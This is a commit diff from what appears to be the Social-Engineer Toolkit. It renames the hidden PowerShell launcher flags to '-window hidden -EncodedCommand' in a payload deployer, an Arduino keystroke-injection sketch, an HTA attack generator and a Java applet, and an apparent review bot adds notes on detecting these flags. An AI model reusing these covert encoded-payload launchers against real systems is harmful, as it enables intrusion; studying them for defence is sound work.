add better handling on powershell encoded command

TrustedSec 2016-07-15 23:02:54 -04:00
parent 438e8aff0a
commit 8d3ea4fe1e
8 changed files with 13 additions and 7 deletions
readme
src


@ -1,3 +1,9 @@
~~~~~~~~~~~~~~~~
version 7.2.3
~~~~~~~~~~~~~~~~
* added better handling around powershell detection
~~~~~~~~~~~~~~~~
version 7.2.2
~~~~~~~~~~~~~~~~


@ -269,7 +269,7 @@ def print_error(message):
def get_version():
define_version = '7.2.2'
define_version = '7.2.3'
return define_version
class create_menu:


@ -222,7 +222,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(
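Review bot: The new prefix on the `x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86` line is the same literal repeated in the next two Python sections (the hunks at `@ -78,7` and `@ -46,7`), and none of the three says why the long parameter names replaced `-win` and `-enc`. Define it once, e.g. `POWERSHELL_PREFIX = "powershell -nop -window hidden -noni -EncodedCommand "`, with a one-line comment giving the reason, so the copies cannot drift apart. For anyone building detections from this page: PowerShell resolves any unambiguous prefix of a parameter name, so `-enc` and `-EncodedCommand` select the same switch, and a rule keyed on one literal spelling will miss the other; match the whole prefix family case-insensitively. The enclosing function starts and ends outside the hunk.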


@ -78,7 +78,7 @@ try:
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(


@ -46,7 +46,7 @@ if powershell_menu_choice != "99":
# here we format everything for us
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(


@ -70,7 +70,7 @@ void loop()
delay(5000);
CommandAtRunBar("cmd");
delay(750);
Keyboard.print("powershell -nop -win hidden -noni -enc ");
Keyboard.print("powershell -nop -window hidden -noni -EncodedCommand ");
// Write the binary to the notepad file
int i;
for (i = 0; i < sizeof(exploit)/sizeof(int); i++) {


@ -33,7 +33,7 @@ def gen_hta_cool_stuff():
"Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(
selection, ipaddr, port, "x86")
command = ("powershell -window hidden -enc " + ps) #.decode('ascii'))
command = ("powershell -window hidden -EncodedCommand " + ps)
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
# grab cloned website


@ -245,7 +245,7 @@ public class Java extends Applet {
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -enc " + arrSplit[i]);
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + arrSplit[i]);
}
}
}